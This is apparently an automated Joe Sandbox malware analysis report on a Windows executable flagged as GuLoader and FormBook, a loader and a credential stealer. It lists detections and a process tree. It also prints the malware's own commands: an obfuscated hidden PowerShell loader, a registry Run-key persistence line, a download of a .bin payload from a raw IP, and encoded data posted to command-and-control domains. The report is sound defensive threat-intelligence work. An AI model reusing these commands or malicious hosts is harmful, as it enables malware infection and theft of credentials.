Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
160420241245287.exe

Overview

General Information

Sample name:160420241245287.exe
Analysis ID:1426828
MD5:0faf0632777806d9e8c13f1ca6fc3237
SHA1:35fea792d63ba1e9deec1d2988bc6456322772d5
SHA256:4585d06cb13de01241bf014db8d49149de7a77a9a0dc13b9007d08a402a035b3
Tags:exe
Infos:

Detection

FormBook, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected FormBook
Yara detected GuLoader
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Obfuscated command line found
Performs DNS queries to domains with low reputation
Powershell drops PE file
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Dosfuscation Activity
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 160420241245287.exe (PID: 7272 cmdline: "C:\Users\user\Desktop\160420241245287.exe" MD5: 0FAF0632777806D9E8C13F1CA6FC3237)
    • powershell.exe (PID: 7304 cmdline: "powershell.exe" -windowstyle hidden "$Titelbladenes=Get-Content 'C:\Users\user\AppData\Roaming\opbevaringssteder\Shrinkageproof\Ursa\Soklernes\Randrusianeren.Unf';$Ryslerne=$Titelbladenes.SubString(75194,3);.$Ryslerne($Titelbladenes)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7456 cmdline: "C:\Windows\system32\cmd.exe" /c "set /A 1^^0" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Untapestried.exe (PID: 7908 cmdline: "C:\Users\user\AppData\Local\Temp\Untapestried.exe" MD5: 0FAF0632777806D9E8C13F1CA6FC3237)
        • cmd.exe (PID: 7944 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Lgplante" /t REG_EXPAND_SZ /d "%Divergente% -windowstyle minimized $Millibar=(Get-ItemProperty -Path 'HKCU:\Ciconiform\').Syskerne;%Divergente% ($Millibar)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • reg.exe (PID: 8000 cmdline: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Lgplante" /t REG_EXPAND_SZ /d "%Divergente% -windowstyle minimized $Millibar=(Get-ItemProperty -Path 'HKCU:\Ciconiform\').Syskerne;%Divergente% ($Millibar)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
        • bvvgQqxLmFZr.exe (PID: 4888 cmdline: "C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • cmd.exe (PID: 8064 cmdline: "C:\Windows\SysWOW64\cmd.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • bvvgQqxLmFZr.exe (PID: 1908 cmdline: "C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
            • firefox.exe (PID: 4348 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000D.00000002.2887373536.0000000001100000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    0000000D.00000002.2887373536.0000000001100000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x3afd3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x24582:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    0000000C.00000002.2886614544.0000000002830000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      0000000C.00000002.2886614544.0000000002830000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2a590:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x13b3f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000007.00000002.2169059789.00000000201B0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 10 entries

        Sigma Signatures

        System Summary

        barindex
        Sigma detected: CurrentVersion Autorun Keys Modification
        Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: %Divergente% -windowstyle minimized $Millibar=(Get-ItemProperty -Path 'HKCU:\Ciconiform\').Syskerne;%Divergente% ($Millibar), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 8000, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Lgplante
        Sigma detected: Direct Autorun Keys Modification
        Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Lgplante" /t REG_EXPAND_SZ /d "%Divergente% -windowstyle minimized $Millibar=(Get-ItemProperty -Path 'HKCU:\Ciconiform\').Syskerne;%Divergente% ($Millibar)", CommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Lgplante" /t REG_EXPAND_SZ /d "%Divergente% -windowstyle minimized $Millibar=(Get-ItemProperty -Path 'HKCU:\Ciconiform\').Syskerne;%Divergente% ($Millibar)", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Lgplante" /t REG_EXPAND_SZ /d "%Divergente% -windowstyle minimized $Millibar=(Get-ItemProperty -Path 'HKCU:\Ciconiform\').Syskerne;%Divergente% ($Millibar)", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7944, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Lgplante" /t REG_EXPAND_SZ /d "%Divergente% -windowstyle minimized $Millibar=(Get-ItemProperty -Path 'HKCU:\Ciconiform\').Syskerne;%Divergente% ($Millibar)", ProcessId: 8000, ProcessName: reg.exe
        Sigma detected: Potential Dosfuscation Activity
        Source: Process startedAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\system32\cmd.exe" /c "set /A 1^^0", CommandLine: "C:\Windows\system32\cmd.exe" /c "set /A 1^^0", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "powershell.exe" -windowstyle hidden "$Titelbladenes=Get-Content 'C:\Users\user\AppData\Roaming\opbevaringssteder\Shrinkageproof\Ursa\Soklernes\Randrusianeren.Unf';$Ryslerne=$Titelbladenes.SubString(75194,3);.$Ryslerne($Titelbladenes)", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7304, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\cmd.exe" /c "set /A 1^^0", ProcessId: 7456, ProcessName: cmd.exe
        Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Lgplante" /t REG_EXPAND_SZ /d "%Divergente% -windowstyle minimized $Millibar=(Get-ItemProperty -Path 'HKCU:\Ciconiform\').Syskerne;%Divergente% ($Millibar)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Lgplante" /t REG_EXPAND_SZ /d "%Divergente% -windowstyle minimized $Millibar=(Get-ItemProperty -Path 'HKCU:\Ciconiform\').Syskerne;%Divergente% ($Millibar)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Untapestried.exe", ParentImage: C:\Users\user\AppData\Local\Temp\Untapestried.exe, ParentProcessId: 7908, ParentProcessName: Untapestried.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Lgplante" /t REG_EXPAND_SZ /d "%Divergente% -windowstyle minimized $Millibar=(Get-ItemProperty -Path 'HKCU:\Ciconiform\').Syskerne;%Divergente% ($Millibar)", ProcessId: 7944, ProcessName: cmd.exe
        Sigma detected: Non Interactive PowerShell Process Spawned
        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle hidden "$Titelbladenes=Get-Content 'C:\Users\user\AppData\Roaming\opbevaringssteder\Shrinkageproof\Ursa\Soklernes\Randrusianeren.Unf';$Ryslerne=$Titelbladenes.SubString(75194,3);.$Ryslerne($Titelbladenes)", CommandLine: "powershell.exe" -windowstyle hidden "$Titelbladenes=Get-Content 'C:\Users\user\AppData\Roaming\opbevaringssteder\Shrinkageproof\Ursa\Soklernes\Randrusianeren.Unf';$Ryslerne=$Titelbladenes.SubString(75194,3);.$Ryslerne($Titelbladenes)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\160420241245287.exe", ParentImage: C:\Users\user\Desktop\160420241245287.exe, ParentProcessId: 7272, ParentProcessName: 160420241245287.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$Titelbladenes=Get-Content 'C:\Users\user\AppData\Roaming\opbevaringssteder\Shrinkageproof\Ursa\Soklernes\Randrusianeren.Unf';$Ryslerne=$Titelbladenes.SubString(75194,3);.$Ryslerne($Titelbladenes)", ProcessId: 7304, ProcessName: powershell.exe

        Snort Signatures

        No Snort rule has matched

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Antivirus detection for URL or domain
        Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
        Multi AV Scanner detection for domain / URL
        Source: http://103.14.155.180/CkkRLCTUxW193.binVirustotal: Detection: 7%Perma Link
        Multi AV Scanner detection for dropped file
        Source: C:\Users\user\AppData\Local\Temp\Untapestried.exeVirustotal: Detection: 18%Perma Link
        Multi AV Scanner detection for submitted file
        Source: 160420241245287.exeVirustotal: Detection: 18%Perma Link
        Yara detected FormBook
        Source: Yara matchFile source: 0000000D.00000002.2887373536.0000000001100000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.2886614544.0000000002830000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.2169059789.00000000201B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.2887996952.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.2887919458.0000000002E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.2169858516.0000000021220000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.2887891622.0000000003350000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Machine Learning detection for dropped file
        Source: C:\Users\user\AppData\Local\Temp\Untapestried.exeJoe Sandbox ML: detected
        Machine Learning detection for sample
        Source: 160420241245287.exeJoe Sandbox ML: detected
        Source: 160420241245287.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5~ source: powershell.exe, 00000001.00000002.2060432087.000000000767E000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdb source: Untapestried.exe, 00000007.00000001.1996319048.0000000000649000.00000008.00000001.01000000.00000009.sdmp
        Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: bvvgQqxLmFZr.exe, 0000000B.00000002.2887014647.0000000000A4E000.00000002.00000001.01000000.0000000A.sdmp, bvvgQqxLmFZr.exe, 0000000D.00000002.2886634622.0000000000A4E000.00000002.00000001.01000000.0000000A.sdmp
        Source: Binary string: wntdll.pdbUGP source: Untapestried.exe, 00000007.00000003.2059573045.0000000020323000.00000004.00000020.00020000.00000000.sdmp, Untapestried.exe, 00000007.00000002.2169142405.00000000204D0000.00000040.00001000.00020000.00000000.sdmp, Untapestried.exe, 00000007.00000002.2169142405.000000002066E000.00000040.00001000.00020000.00000000.sdmp, Untapestried.exe, 00000007.00000003.2057819676.0000000020179000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000003.2155560339.0000000002D7F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000003.2157021649.0000000002F22000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: cmd.pdbUGP source: Untapestried.exe, 00000007.00000003.2114834443.0000000004778000.00000004.00000020.00020000.00000000.sdmp, Untapestried.exe, 00000007.00000003.2155304124.00000000201F1000.00000004.00000020.00020000.00000000.sdmp, bvvgQqxLmFZr.exe, 0000000B.00000003.2085185213.0000000000E0B000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: Untapestried.exe, Untapestried.exe, 00000007.00000003.2059573045.0000000020323000.00000004.00000020.00020000.00000000.sdmp, Untapestried.exe, 00000007.00000002.2169142405.00000000204D0000.00000040.00001000.00020000.00000000.sdmp, Untapestried.exe, 00000007.00000002.2169142405.000000002066E000.00000040.00001000.00020000.00000000.sdmp, Untapestried.exe, 00000007.00000003.2057819676.0000000020179000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, cmd.exe, 0000000C.00000003.2155560339.0000000002D7F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000003.2157021649.0000000002F22000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdbUGP source: Untapestried.exe, 00000007.00000001.1996319048.0000000000649000.00000008.00000001.01000000.00000009.sdmp
        Source: Binary string: cmd.pdb source: Untapestried.exe, 00000007.00000003.2114834443.0000000004778000.00000004.00000020.00020000.00000000.sdmp, Untapestried.exe, 00000007.00000003.2155304124.00000000201F1000.00000004.00000020.00020000.00000000.sdmp, bvvgQqxLmFZr.exe, 0000000B.00000003.2085185213.0000000000E0B000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdba source: powershell.exe, 00000001.00000002.2060432087.0000000007705000.00000004.00000020.00020000.00000000.sdmp
        Source: C:\Users\user\Desktop\160420241245287.exeCode function: 0_2_00405772 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405772
        Source: C:\Users\user\Desktop\160420241245287.exeCode function: 0_2_0040622D FindFirstFileW,FindClose,0_2_0040622D
        Source: C:\Users\user\Desktop\160420241245287.exeCode function: 0_2_00402770 FindFirstFileW,0_2_00402770
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0284B880 FindFirstFileW,FindNextFileW,FindClose,12_2_0284B880
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\opbevaringssteder\Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\opbevaringssteder\coryphene\Foldedrs\Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\opbevaringssteder\coryphene\Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 4x nop then xor eax, eax12_2_02839430
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 4x nop then pop edi12_2_02841DAF
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 4x nop then pop edi12_2_02841DD0

        Networking

        barindex
        Performs DNS queries to domains with low reputation
        Source: DNS query: www.eternalsunrise.xyz
        Source: Joe Sandbox ViewIP Address: 103.14.155.180 103.14.155.180
        Source: Joe Sandbox ViewIP Address: 219.94.128.41 219.94.128.41
        Source: Joe Sandbox ViewIP Address: 66.29.135.159 66.29.135.159
        Source: Joe Sandbox ViewASN Name: ADVANTAGECOMUS ADVANTAGECOMUS
        Source: unknownTCP traffic detected without corresponding DNS query: 103.14.155.180
        Source: unknownTCP traffic detected without corresponding DNS query: 103.14.155.180
        Source: unknownTCP traffic detected without corresponding DNS query: 103.14.155.180
        Source: unknownTCP traffic detected without corresponding DNS query: 103.14.155.180
        Source: unknownTCP traffic detected without corresponding DNS query: 103.14.155.180
        Source: unknownTCP traffic detected without corresponding DNS query: 103.14.155.180
        Source: unknownTCP traffic detected without corresponding DNS query: 103.14.155.180
        Source: unknownTCP traffic detected without corresponding DNS query: 103.14.155.180
        Source: unknownTCP traffic detected without corresponding DNS query: 103.14.155.180
        Source: unknownTCP traffic detected without corresponding DNS query: 103.14.155.180
        Source: unknownTCP traffic detected without corresponding DNS query: 103.14.155.180
        Source: unknownTCP traffic detected without corresponding DNS query: 103.14.155.180
        Source: unknownTCP traffic detected without corresponding DNS query: 103.14.155.180
        Source: unknownTCP traffic detected without corresponding DNS query: 103.14.155.180
        Source: unknownTCP traffic detected without corresponding DNS query: 103.14.155.180
        Source: unknownTCP traffic detected without corresponding DNS query: 103.14.155.180
        Source: unknownTCP traffic detected without corresponding DNS query: 103.14.155.180
        Source: unknownTCP traffic detected without corresponding DNS query: 103.14.155.180
        Source: unknownTCP traffic detected without corresponding DNS query: 103.14.155.180
        Source: unknownTCP traffic detected without corresponding DNS query: 103.14.155.180
        Source: unknownTCP traffic detected without corresponding DNS query: 103.14.155.180
        Source: unknownTCP traffic detected without corresponding DNS query: 103.14.155.180
        Source: unknownTCP traffic detected without corresponding DNS query: 103.14.155.180
        Source: unknownTCP traffic detected without corresponding DNS query: 103.14.155.180
        Source: unknownTCP traffic detected without corresponding DNS query: 103.14.155.180
        Source: unknownTCP traffic detected without corresponding DNS query: 103.14.155.180
        Source: unknownTCP traffic detected without corresponding DNS query: 103.14.155.180
        Source: unknownTCP traffic detected without corresponding DNS query: 103.14.155.180
        Source: unknownTCP traffic detected without corresponding DNS query: 103.14.155.180
        Source: unknownTCP traffic detected without corresponding DNS query: 103.14.155.180
        Source: unknownTCP traffic detected without corresponding DNS query: 103.14.155.180
        Source: unknownTCP traffic detected without corresponding DNS query: 103.14.155.180
        Source: unknownTCP traffic detected without corresponding DNS query: 103.14.155.180
        Source: unknownTCP traffic detected without corresponding DNS query: 103.14.155.180
        Source: unknownTCP traffic detected without corresponding DNS query: 103.14.155.180
        Source: unknownTCP traffic detected without corresponding DNS query: 103.14.155.180
        Source: unknownTCP traffic detected without corresponding DNS query: 103.14.155.180
        Source: unknownTCP traffic detected without corresponding DNS query: 103.14.155.180
        Source: unknownTCP traffic detected without corresponding DNS query: 103.14.155.180
        Source: unknownTCP traffic detected without corresponding DNS query: 103.14.155.180
        Source: unknownTCP traffic detected without corresponding DNS query: 103.14.155.180
        Source: unknownTCP traffic detected without corresponding DNS query: 103.14.155.180
        Source: unknownTCP traffic detected without corresponding DNS query: 103.14.155.180
        Source: unknownTCP traffic detected without corresponding DNS query: 103.14.155.180
        Source: unknownTCP traffic detected without corresponding DNS query: 103.14.155.180
        Source: unknownTCP traffic detected without corresponding DNS query: 103.14.155.180
        Source: unknownTCP traffic detected without corresponding DNS query: 103.14.155.180
        Source: unknownTCP traffic detected without corresponding DNS query: 103.14.155.180
        Source: unknownTCP traffic detected without corresponding DNS query: 103.14.155.180
        Source: unknownTCP traffic detected without corresponding DNS query: 103.14.155.180
        Source: global trafficHTTP traffic detected: GET /CkkRLCTUxW193.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 103.14.155.180Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /9pdo/?jzuh=7Bfls2&edR0hF=DnYaRovP48GzkkJrYMXu2fP+AE8bpUHwuVP/6iFiedv+ORSC+0oTk/Kl1D7Kx2hOtjeczUyzMCTs4BuiBiMVyf8d4q8oRy488on7FLg2VDUaCWqziINF2DU= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeHost: www.ejbodyart.comUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4
        Source: global trafficHTTP traffic detected: GET /9pdo/?edR0hF=9/X38tn9qLO2xSF02XNB/rY3zD6RCSMCRmtcXfkuabXCkgKRDBhcw5zs5NSemU/1fww/nV1egvBpaCqwFniev+GXC9dB/42VqWS3YgLMlW8u3PKxI03yuVQ=&jzuh=7Bfls2 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeHost: www.jt-berger.storeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4
        Source: global trafficHTTP traffic detected: GET /9pdo/?edR0hF=REEnkW6M+TEq7R0RTFAEOK6A593ZXFJD8cCdAclTZkEAO29Celit1EJdRt8L6G9Xd5xqtutsMklg2OrtOvYkqvTyuEt4cazTHdJ4IhgWhtZseUa+ZlJk5aI=&jzuh=7Bfls2 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeHost: www.n-benriya002.comUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4
        Source: global trafficHTTP traffic detected: GET /9pdo/?edR0hF=exLCvVI2E5RJM8xtzs4Hapiqzu/uGv/f+6d2cWgRCMmdoFVcUWazUq40e3zK6s54E+NAVH76kqhd1uh4f2sEtFmHSsWrMW9P35+QXkOmQzbQkkc9XIR6mDA=&jzuh=7Bfls2 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeHost: www.scwspark.comUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4
        Source: unknownDNS traffic detected: queries for: www.ejbodyart.com
        Source: unknownHTTP traffic detected: POST /9pdo/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-usContent-Type: application/x-www-form-urlencodedContent-Length: 203Connection: closeCache-Control: no-cacheHost: www.jt-berger.storeOrigin: http://www.jt-berger.storeReferer: http://www.jt-berger.store/9pdo/User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4Data Raw: 65 64 52 30 68 46 3d 77 39 2f 58 2f 5a 4c 35 36 72 61 5a 34 68 56 33 39 45 78 32 2f 70 45 76 31 45 53 4e 62 53 74 57 57 55 56 72 52 66 38 4f 48 36 44 43 68 41 76 2f 4c 6b 41 68 6c 62 58 49 33 4a 79 6b 6f 57 53 44 63 58 6b 31 37 46 4a 76 6a 66 42 6b 54 78 44 68 4e 6d 36 6d 2b 37 4b 69 44 39 70 47 77 35 75 31 6b 6c 36 34 66 77 6d 71 74 57 34 71 7a 39 32 53 42 6b 76 63 76 6d 78 6a 41 59 6f 61 43 63 4e 56 38 56 57 38 34 79 58 77 37 76 37 58 74 5a 58 57 68 30 66 47 52 73 6c 73 72 45 45 73 72 46 33 69 30 71 74 34 4d 50 46 2f 30 70 73 4e 74 30 70 79 5a 54 38 49 41 70 77 56 78 54 6a 76 78 51 70 6a 31 51 3d 3d Data Ascii: edR0hF=w9/X/ZL56raZ4hV39Ex2/pEv1ESNbStWWUVrRf8OH6DChAv/LkAhlbXI3JykoWSDcXk17FJvjfBkTxDhNm6m+7KiD9pGw5u1kl64fwmqtW4qz92SBkvcvmxjAYoaCcNV8VW84yXw7v7XtZXWh0fGRslsrEEsrF3i0qt4MPF/0psNt0pyZT8IApwVxTjvxQpj1Q==
